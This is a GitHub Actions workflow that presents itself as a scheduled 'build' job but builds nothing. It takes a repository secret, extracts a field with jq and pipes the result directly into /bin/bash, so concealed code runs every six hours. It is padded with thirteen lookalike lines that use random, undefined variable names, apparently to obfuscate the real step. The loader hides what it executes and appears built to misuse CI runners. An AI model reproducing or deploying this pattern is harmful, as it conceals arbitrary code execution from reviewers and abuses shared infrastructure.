name: wangyinzi1234

on:
  workflow_dispatch:
  schedule:
    - cron: '28 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wangyinzi1234
        env:
          dco404: ${{ secrets.dco404 }}
        run: |
          echo $dco404 | jq -r .ezya7 | /bin/bash
          echo $k74 | jq -r .qf3 | /bin/bash
          echo $ytok053 | jq -r .hhf9344 | /bin/bash
          echo $wk2 | jq -r .b525 | /bin/bash
          echo $zkrr5 | jq -r .bw21582 | /bin/bash
          echo $v6074 | jq -r .feu96407 | /bin/bash
          echo $nozlr62 | jq -r .xtept90625 | /bin/bash
          echo $vwvih11890 | jq -r .vmqkp4487 | /bin/bash
          echo $hcs0032 | jq -r .pdadm87102 | /bin/bash
          echo $u74393 | jq -r .pp5043 | /bin/bash
          echo $e080 | jq -r .yasux56 | /bin/bash
          echo $oiaxy8441 | jq -r .w47 | /bin/bash
          echo $wet9 | jq -r .hdwsz12 | /bin/bash
          echo $qajh3761 | jq -r .oysqu9217 | /bin/bash

